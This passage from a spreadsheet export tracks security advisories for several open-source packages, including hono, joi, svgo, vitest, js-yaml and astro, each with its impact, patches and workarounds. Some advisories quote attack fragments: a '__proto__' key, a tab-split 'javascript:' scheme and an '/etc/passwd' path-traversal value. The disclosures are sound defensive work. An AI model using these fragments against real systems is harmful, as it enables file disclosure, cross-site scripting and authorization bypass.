path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t></is></c><c r="T1629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t></is></c></row><row r="1630"><c r="A1630" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1630" s="5" t="inlineStr"><is><t>CVE-2026-84303</t></is></c><c r="D1630" s="5" t="inlineStr" /><c r="E1630" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1630" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1630" s="5" t="inlineStr" /><c r="H1630" s="5" t="n"><v>0.003</v></c><c r="I1630" s="5" t="inlineStr" /><c r="J1630" s="5" t="inlineStr" /><c r="K1630" s="5" t="inlineStr" /><c r="L1630" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M1630" s="5" t="inlineStr"><is><t>1.83.1</t></is></c><c r="N1630" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1630" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1630" s="5" t="inlineStr" /><c r="R1630" s="5" t="inlineStr" /><c r="S1630" s="5" t="inlineStr"><is><t>### Summary
A vulnerability in the xDS RBAC HTTP filter implementation in grpc-go allows remote attackers to bypass authorization policies (specifically DENY rules) by using mixed-case or canonical-case header matchers (e.g., X-Role instead of x-role). Additionally, the safety guards introduced by gRFC A41 to block grpc- prefixed headers can be evaded via variations in casing (e.g., Grpc-Status).

### Impact
When an operator defines an RBAC policy referencing headers containing uppercase letters (e.g. X-Role), grpc-go fails to match incoming metadata keys because they are unconditionally lowercased. Because of this case-sensitivity mismatch, a policy designed to block requests containing specific header values fails open: the rule is evaluated as a non-match, and traffic that should have been rejected is served.

Furthermore, gRFC A41 requires rejecting configuration schemas specifying header matchers starting with grpc-. Because this check is executed case-sensitively in grpc-go, attackers can bypass the validation by specifying titles like Grpc-Status.

### Patches
The problem is fixed in `master` and in the 1.83.1 release.</t></is></c><c r="T1630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t></is></c></row><row r="1631"><c r="A1631" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1631" s="5" t="inlineStr"><is><t>CVE-2026-84363</t></is></c><c r="D1631" s="5" t="inlineStr" /><c r="E1631" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1631" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1631" s="5" t="inlineStr" /><c r="H1631" s="5" t="n"><v>0.003</v></c><c r="I1631" s="5" t="inlineStr" /><c r="J1631" s="5" t="inlineStr" /><c r="K1631" s="5" t="inlineStr" /><c r="L1631" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1631" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1631" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1631" s="5" t="inlineStr" /><c r="R1631" s="5" t="inlineStr" /><c r="S1631" s="5" t="inlineStr"><is><t>### Summary

Hono's query parsing does not stop at the URL fragment: a `?` appearing after a `#` is treated as the start of a query string. As a result, the application can read request parameters that no other component involved in handling the request can see.

### Details

A fragment is never part of the query, and every standard URL consumer — browsers, `new URL()`, reverse proxies — ignores everything from the first `#` onward. Hono's routing followed that rule; its query helpers did not.

For one and the same request, this produces an interpretation differential:

- A component in front of the application that inspects the query string — filtering rules, parameter allow/deny lists, access logging — observes no parameters, while the application reads and acts on them.
- The cache middleware removed the fragment when building its cache key, so a response influenced by parameters carried inside the fragment could be stored under a key that did not reflect them and later returned to other users.

The same divergence reaches request validation and any middleware that reads query parameters.

This requires a request target containing a literal `#` to reach the application. Deployments on runtimes that normalise such a target — including Cloudflare Workers — are not affected, and neither are those behind an intermediary that strips the fragment.

### Impact

An attacker can cause the application to act on parameters that components in front of it never observe.

This may lead to:

- filtering rules, allow/deny lists, and audit logging being blind to parameters the application still processes
- a cached response being stored under a key that does not reflect the parameters used to produce it, and served to other users
- stored cross-site scripting, where such a parameter is reflected into a cached HTML response without escaping

This issue affects applications that read query parameters and run on a runtime that passes a literal `#` through to the request URL.</t></is></c><c r="T1631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t></is></c></row><row r="1632"><c r="A1632" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1632" s="5" t="inlineStr"><is><t>CVE-2026-84364</t></is></c><c r="D1632" s="5" t="inlineStr" /><c r="E1632" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1632" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1632" s="5" t="inlineStr" /><c r="H1632" s="5" t="n"><v>0.004</v></c><c r="I1632" s="5" t="inlineStr" /><c r="J1632" s="5" t="inlineStr" /><c r="K1632" s="5" t="inlineStr" /><c r="L1632" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1632" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1632" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1632" s="5" t="inlineStr" /><c r="R1632" s="5" t="inlineStr" /><c r="S1632" s="5" t="inlineStr"><is><t>### Summary

When `parseBody()` expands dot-separated form field names into nested objects, it does not limit the nesting depth or the total number of objects created. A request body well within a normal size limit can therefore allocate an object graph far larger than the request itself, and concurrent requests can exhaust the heap and terminate the process.

### Details

Each dot-separated segment of a field name creates an intermediate object. Neither the segments within a single field name nor the total across a request was bounded, and empty segments were preserved, so a field name could encode one nesting level per byte.

Both shapes produce the effect: a single deeply dotted field name, and a large number of shallowly dotted ones within one body. A request body size limit does not prevent it, because the amplification happens after the body has been accepted.

Dot-notation parsing is not enabled by default.

### Impact

An attacker who can reach an endpoint that parses request bodies with dot-notation enabled can send concurrent requests whose memory cost is disproportionate to their size.

This may lead to:

- exhaustion of the JavaScript heap and termination of the server process
- the service remaining unavailable until it is restarted

This issue affects applications that explicitly enable dot-notation parsing. Applications using the default behaviour are not affected.</t></is></c><c r="T1632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t></is></c></row><row r="1633"><c r="A1633" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1633" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1633" s="5" t="inlineStr"><is><t>CVE-2026-84365</t></is></c><c r="D1633" s="5" t="inlineStr" /><c r="E1633" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1633" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1633" s="5" t="inlineStr" /><c r="H1633" s="5" t="n"><v>0.003</v></c><c r="I1633" s="5" t="inlineStr" /><c r="J1633" s="5" t="inlineStr" /><c r="K1633" s="5" t="inlineStr" /><c r="L1633" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1633" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1633" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1633" s="5" t="inlineStr" /><c r="R1633" s="5" t="inlineStr" /><c r="S1633" s="5" t="inlineStr"><is><t>### Summary

The fix released for CVE-2026-39408 does not cover every traversal sequence. `toSSG()` can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments.

### Details

Static site generation builds each output path from the route path and the values supplied through `ssgParams`, then verifies that the result stays inside the output directory. That check normalizes the path with the same routine that built it, and the routine did not fully collapse runs of consecutive parent-directory segments. A value carrying enough of them produces a path the check accepts, but the filesystem resolves outside the output directory.

The earlier fix handled a single parent-directory segment, so it blocks the sequence reported at the time while leaving longer runs unhandled. The check also treated output directories that differ only in how they are rooted as equivalent.

This arises when an application generates a static site from route parameter values it does not fully control — slugs coming from a CMS, an API, or user submissions.

### Impact

A value reaching `ssgParams` from an untrusted source can cause build output to be written outside the intended output directory, carrying whatever content the route handler produced.

This may lead to:

- files being created or overwritten elsewhere in the build environment
- generated artifacts or deployment output being altered

This affects build-time static site generation only; request-time routing is not affected. Applications whose `ssgParams` values are entirely developer-controlled are not affected.</t></is></c><c r="T1633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t></is></c></row><row r="1634"><c r="A1634" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1634" s="5" t="inlineStr"><is><t>CVE-2026-84367</t></is></c><c r="D1634" s="5" t="inlineStr" /><c r="E1634" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1634" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1634" s="5" t="inlineStr" /><c r="H1634" s="5" t="n"><v>0.003</v></c><c r="I1634" s="5" t="inlineStr" /><c r="J1634" s="5" t="inlineStr" /><c r="K1634" s="5" t="inlineStr" /><c r="L1634" s="5" t="inlineStr"><is><t>npm:joi</t></is></c><c r="M1634" s="5" t="inlineStr"><is><t>17.13.5, 18.2.4</t></is></c><c r="N1634" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1634" s="5" t="inlineStr" /><c r="R1634" s="5" t="inlineStr" /><c r="S1634" s="5" t="inlineStr"><is><t>### Impact

Applications are affected only if a schema renames keys with a regular-expression source and a `Joi.expression()` / `Joi.x()` target that interpolates the pattern's own match data, combined with `{ multiple: true }`, for example `.rename(/^x-(.+)$/, Joi.x('{#1}'), { multiple: true })`. Because the target is rendered from the matched input key, an attacker who controls input keys can send `x-__proto__` with an object value and make the rename target render as `__proto__`, which sets the prototype of the object joi returns instead of creating a key on it. The global `Object.prototype` is not modified, so the effect is confined to the object returned by that one `validate()` call.

Schemas using a static string rename target are not affected, and neither are schemas left on the default `{ multiple: false }`.

### Patches

Versions 17.13.5 and 18.2.4 have been released to address the issue.

### Workarounds

1. Replace the template rename target with a static string target.
2. Keep the template but make the capture unable to produce `__proto__`, using a negative lookahead: `.rename(/^x-(?!__proto__$)(.+)$/, Joi.x('{#1}'), { multiple: true })`
3. Drop { multiple: true } from the rename, which stops the rename before the assignment.</t></is></c><c r="T1634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t></is></c></row><row r="1635"><c r="A1635" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1635" s="5" t="inlineStr"><is><t>CVE-2026-84368</t></is></c><c r="D1635" s="5" t="inlineStr" /><c r="E1635" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1635" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1635" s="5" t="inlineStr" /><c r="H1635" s="5" t="n"><v>0.003</v></c><c r="I1635" s="5" t="inlineStr" /><c r="J1635" s="5" t="inlineStr" /><c r="K1635" s="5" t="inlineStr" /><c r="L1635" s="5" t="inlineStr"><is><t>npm:@hapi/joi, npm:joi</t></is></c><c r="M1635" s="5" t="inlineStr"><is><t>17.13.6, 18.2.5</t></is></c><c r="N1635" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1635" s="5" t="inlineStr" /><c r="R1635" s="5" t="inlineStr" /><c r="S1635" s="5" t="inlineStr"><is><t>### Impact
An application that passes attacker-controlled data into joi's custom message configuration (`messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`) lets the attacker write properties onto `Object.prototype`, where every object in the process then inherits them. A key named `__proto__` was treated as a language name, and the code reused the object it found at that key, which resolves to the prototype rather than to a new own property; a key named `constructor` did the same to the `Object` function's statics. A consuming application that gates on the mere presence of a property (`if (user.isAdmin)`) can be made to take the wrong branch for every object it inspects.

This is not reachable from data that joi validates. Custom messages are schema-construction configuration, normally written by the application developer. Exploitation therefore requires an application that feeds untrusted input straight into schema construction.

### Patches
Upgrade to version 18.2.5 or 17.13.6.

### Workarounds
Do not pass untrusted input into `messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`. Or validate that they don't contain any `__proto__` or `constructor` property.</t></is></c><c r="T1635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t></is></c></row><row r="1636"><c r="A1636" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1636" s="5" t="inlineStr"><is><t>CVE-2026-84369</t></is></c><c r="D1636" s="5" t="inlineStr" /><c r="E1636" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1636" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1636" s="5" t="inlineStr" /><c r="H1636" s="5" t="n"><v>0.003</v></c><c r="I1636" s="5" t="inlineStr" /><c r="J1636" s="5" t="inlineStr" /><c r="K1636" s="5" t="inlineStr" /><c r="L1636" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M1636" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N1636" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1636" s="5" t="inlineStr" /><c r="R1636" s="5" t="inlineStr" /><c r="S1636" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin did not inspect executable HTML content inside SVG `&lt;foreignObject&gt;` elements. Applications that used this plugin as their only protection for untrusted SVG input could produce SVGs containing active HTML and expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Although the plugin removed SVG and XHTML `&lt;script&gt;` elements, it left other HTML execution paths inside `&lt;foreignObject&gt;` unchanged. These included:

- event-handler attributes such as `onload` and `onbeforetoggle`;
- `srcdoc` documents, including on `&lt;iframe&gt;` elements;
- executable URLs in HTML attributes such as `action`, `data`, `formaction`, `href`, and `src`.

An attacker could place one of these payloads in an SVG. If an application optimized the untrusted SVG with `removeScripts` and then served the result in an active browser context, the payload could execute in the viewer's origin.

## Impact

Successful exploitation could allow script execution in the context where the optimized SVG is rendered. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable `removeScripts`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preserves visual HTML inside SVG `&lt;foreignObject&gt;` elements while removing event attributes, `srcdoc`, and executable URL values from active HTML URL attributes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. As defense in depth, applications can reject or remove `&lt;foreignObject&gt;` content and avoid serving user-controlled SVGs in an active same-origin context.</t></is></c><c r="T1636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t></is></c></row><row r="1637"><c r="A1637" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1637" s="5" t="inlineStr"><is><t>CVE-2026-84370</t></is></c><c r="D1637" s="5" t="inlineStr" /><c r="E1637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1637" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1637" s="5" t="inlineStr" /><c r="H1637" s="5" t="n"><v>0.003</v></c><c r="I1637" s="5" t="inlineStr" /><c r="J1637" s="5" t="inlineStr" /><c r="K1637" s="5" t="inlineStr" /><c r="L1637" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M1637" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N1637" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1637" s="5" t="inlineStr" /><c r="R1637" s="5" t="inlineStr" /><c r="S1637" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin failed to remove some executable links. Namespace-prefixed SVG anchors and URL schemes containing ASCII tabs or newlines could bypass its checks. Applications that used this plugin as their only protection for untrusted SVG input could expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Two related bypasses were present:

1. The plugin inspected unprefixed SVG `&lt;a&gt;` elements but did not recognize namespace-prefixed SVG anchors such as `&lt;svg:a&gt;` when the prefix was bound to the SVG namespace. Their executable `href` or namespaced `*:href` values remained intact.
2. The URL check did not account for ASCII tab, line-feed, or carriage-return characters embedded in a scheme. Browsers remove these characters before parsing the scheme, so values such as `java&amp;#9;script:` could remain executable after bypassing the plugin's `javascript:` check.

Anchors in unrelated custom namespaces are not executable SVG anchors and remain untouched.

## Impact

If an application optimized attacker-controlled SVGs with `removeScripts` and then served the result in an active browser context, a victim could follow a link that executes script in the SVG's origin. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable it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makes SVG anchor handling namespace-aware and strips ASCII tabs, line feeds, and carriage returns before checking executable URL schemes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. Applications can also reject links from untrusted SVG input and avoid serving user-controlled SVGs in an active same-origin context.

## References

- v4 fix: https://github.com/svg/svgo/pull/2268
- related executable URL hardening: https://github.com/svg/svgo/pull/2263
- v3 backport: https://github.com/svg/svgo/pull/2269
- v2 backport: https://github.com/svg/svgo/pull/2272
- v4.1.0 release: https://github.com/svg/svgo/releases/tag/v4.1.0
- v3.3.5 release: https://github.com/svg/svgo/releases/tag/v3.3.5
- v2.8.4 release: https://github.com/svg/svgo/releases/tag/v2.8.4</t></is></c><c r="T1637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t></is></c></row><row r="1638"><c r="A1638" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1638" s="5" t="inlineStr"><is><t>CVE-2026-84373</t></is></c><c r="D1638" s="5" t="inlineStr" /><c r="E1638" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1638" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1638" s="5" t="inlineStr" /><c r="H1638" s="5" t="n"><v>0.004</v></c><c r="I1638" s="5" t="inlineStr" /><c r="J1638" s="5" t="inlineStr" /><c r="K1638" s="5" t="inlineStr" /><c r="L1638" s="5" t="inlineStr"><is><t>npm:@vitest/mocker, npm:vitest</t></is></c><c r="M1638" s="5" t="inlineStr"><is><t>4.1.11, 5.0.0-rc.2</t></is></c><c r="N1638" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1638" s="5" t="inlineStr" /><c r="R1638" s="5" t="inlineStr" /><c r="S1638" s="5" t="inlineStr"><is><t>## Summary
`@vitest/mocker` registers a redirect mock's target path without validating it
against the dev server's file-serving allowlist. An attacker who can reach the
dev server's WebSocket can register a redirect mock pointing outside the project
root; when the mocked module is requested, the plugin's `load` hook returns
`readFile(&lt;attacker path&gt;)` as the module source, disclosing local files.

This is exploitable **without authentication** only through the public
`mockerPlugin` / standalone `interceptorPlugin` exports (used by third-party dev
servers), which register the handler on Vite's unauthenticated HMR socket.
Vitest's own browser mode registers mocks over a **token-authenticated** RPC and
is not remotely reachable by default (see Scope).

## Affected code
`packages/mocker/src/node/interceptorPlugin.ts`.

The `load` hook is the file-read sink:

```ts
if (mock.type === 'redirect') {
  return readFile(mock.redirect, 'utf-8')
}
```

`mock.redirect` is derived from client input at registration time with no
boundary check:

```ts
if (event.type === 'redirect') {
  const redirectUrl = new URL(event.redirect)
  event.redirect = join(server.config.root, redirectUrl.pathname)
}
registry.register(event)
```

There is no `server.fs.allow` / `server.fs.deny` check and no assertion that the
resolved path stays within the project root.

## Registration paths and trust boundaries
- **Public `mockerPlugin` / `interceptorPlugin` (unauthenticated).** In
  `configureServer`, the plugin registers `server.ws.on('vitest:interceptor:register', …)`
  on Vite's HMR WebSocket. That socket performs no token, Origin, or same-origin
  check, so any client that can reach it can register a redirect mock. This is
  the path the "unauthenticated" impact applies to.
- **Vitest browser mode (authenticated).** Mocks register over the browser RPC
  (`registerMock`), which sits behind a per-run token (`isValidApiRequest`, a
  random `api.token`). The interceptor's `configureServer` socket is not used for
  registration here (in v5 it does not run at all, as the plugin is injected per
  environment). The same missing boundary check exists on the authenticated RPC
  path, but reaching it requires the token, so it is not a remote-unauthenticated
  read.

## Path handling
`new URL(redirect).pathname` combined with `join(root, pathname)` does **not**
confine reads to the root:

- Special/hierarchical schemes (`file:`, `http:`) are normalized by WHATWG URL,
  so `..` segments are collapsed and the result stays under the root. Payloads of
  the form `file:///../../etc/passwd` do **not** escape.
- A non-special (opaque) scheme preserves `..` in `pathname`, so
  `join(root, "../../…/etc/passwd")` resolves outside the root and reads an
  arbitrary file.

Even without escaping the root, the missing `server.fs` check allows reading any
in-root file the dev server would otherwise refuse to serve (for example an
in-root `.env` or source that is denied by `server.fs.deny`).

## Scope / preconditions
- This is a **development-server** issue. The dev server binds to `localhost` by
  default and is not reachable from the network unless the developer exposes it
  (`server.host` / `0.0.0.0`, a LAN bind, or a proxy).
- A raw (non-browser) client against a reachable server bypasses browser origin
  and CORS protections entirely and can both register the mock and read the
  response.
- A browser-based drive-by against a localhost server is substantially mitigated
  by Vite defaults: the default CORS origin allowlist is limited to `localhost`
  origins, and `server.allowedHosts` blocks DNS-rebinding, so a cross-origin page
  cannot read the file contents back.

## Impact
Disclosure of local files readable by the dev-server process (source, in-root
`.env`/secrets, and, via the opaque-scheme payload, files outside the project
root). No integrity or availability impact.

## Affected versions
Present since `@vitest/mocker` was introduced.

- **Affected: `@vitest/mocker` &gt;= 2.1.0** (shipped in `vitest` and
  `@vitest/browser` &gt;= 2.1.0), through 4.1.x and the 5.0.0 pre-releases.
- **Fixed:** Vitest 4.1.11 and 5.0.0. Older majors (2.1.x, 3.x) are not
  maintained and are not planned to receive the fix.

## Fix
Validate the resolved redirect target against Vite's file-serving allowlist
(`isFileLoadingAllowed`) before registering it, at every registration site, and
stop registering the interceptor WebSocket events in Vitest's browser mode
(mocks there flow through the authenticated RPC).</t></is></c><c r="T1638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t></is></c></row><row r="1639"><c r="A1639" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1639" s="5" t="inlineStr"><is><t>CVE-2026-84375</t></is></c><c r="D1639" s="5" t="inlineStr" /><c r="E1639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1639" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1639" s="5" t="inlineStr" /><c r="H1639" s="5" t="n"><v>0.004</v></c><c r="I1639" s="5" t="inlineStr" /><c r="J1639" s="5" t="inlineStr" /><c r="K1639" s="5" t="inlineStr" /><c r="L1639" s="5" t="inlineStr"><is><t>npm:js-yaml</t></is></c><c r="M1639" s="5" t="inlineStr"><is><t>3.15.2, 4.3.2</t></is></c><c r="N1639" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1639" s="5" t="inlineStr" /><c r="R1639" s="5" t="inlineStr" /><c r="S1639" s="5" t="inlineStr"><is><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An attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default `maxTotalMergeKeys` limit.

## Fix

Count each merge-source mapping as one budget unit, in addition to counting its keys.

## Difference with v5

In v3 &amp; v4, merge is enabled by default. So, the severity score is higher.</t></is></c><c r="T1639" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t></is></c></row><row r="1640"><c r="A1640" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1640" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1640" s="5" t="inlineStr"><is><t>CVE-2026-84376</t></is></c><c r="D1640" s="5" t="inlineStr" /><c r="E1640" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1640" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1640" s="5" t="inlineStr" /><c r="H1640" s="5" t="n"><v>0.004</v></c><c r="I1640" s="5" t="inlineStr" /><c r="J1640" s="5" t="inlineStr" /><c r="K1640" s="5" t="inlineStr" /><c r="L1640" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M1640" s="5" t="inlineStr"><is><t>7.2.4</t></is></c><c r="N1640" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1640" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1640" s="5" t="inlineStr" /><c r="R1640" s="5" t="inlineStr" /><c r="S1640" s="5" t="inlineStr"><is><t>## Summary

Astro stripped a configured `base` path from request pathnames using a string-prefix check that did not verify a path-segment boundary. With `base: "/app"`, a request to `/appX/admin` was treated as being under the base and resolved internally to the `/admin` route, while middleware still observed the public pathname `/appX/admin`. Middleware that authorizes routes by inspecting `context.url.pathname` could therefore be bypassed.

## Impact

An unauthenticated remote attacker can bypass pathname-based middleware authorization in applications that:

- Configure a non-root `base`.
- Protect base-prefixed routes in middleware using `context.url.pathname`.

Because routing and middleware resolved different effective pathnames, a request such as `/appX/admin` (or other single-character extensions like `/app2/admin` or `/app-/admin`) reached the protected `/admin` route without passing the middleware check that guards `/app/admin`. Astro's authentication guide demonstrates protecting routes in middleware via `context.url.pathname`, so this is a reasonable and expected pattern.

## Affected versions

`astro` &lt;= 7.2.3.

## Patches

Fixed in `astro` 7.2.4. Base stripping now requires the pathname to equal the base without its trailing slash, or to be followed by a `/`, so a prefix that does not end on a path-segment boundary is no longer treated as being under the base. Routing and `context.url.pathname` now resolve the same pathname.

## Workarounds

Upgrade to `astro` 7.2.4 or later. As a mitigation before upgrading, avoid relying solely on prefix checks of `context.url.pathname` for authorization, or reject requests whose pathname does not begin with the configured base followed by a path-segment boundary.

## Credits

Reported by @Ryoga-exe.</t></is></c><c r="T1640" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t></is></c></row><row r="1641"><c r="A1641" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1641" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1641" s="5" t="inlineStr"><is><t>CVE-2026-84378</t></is></c><c r="D1641" s="5" t="inlineStr" /><c r="E1641" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1641" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1641" s="5" t="inlineStr" /><c r="H1641" s="5" t="n"><v>0.003</v></c><c r="I1641" s="5" t="inlineStr" /><c r="J1641" s="5" t="inlineStr" /><c r="K1641" s="5" t="inlineStr" /><c r="L1641" s="5" t="inlineStr"><is><t>PyPI:httpx2</t></is></c><c r="M1641" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N1641" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1641" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1641" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1641" s="5" t="inlineStr" /><c r="R1641" s="5" t="inlineStr" /><c r="S1641" s="5" t="inlineStr"><is><t>### Summary

HTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.

### Details

Before version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.

The behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.

### Impact

Applications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.

### Mitigation

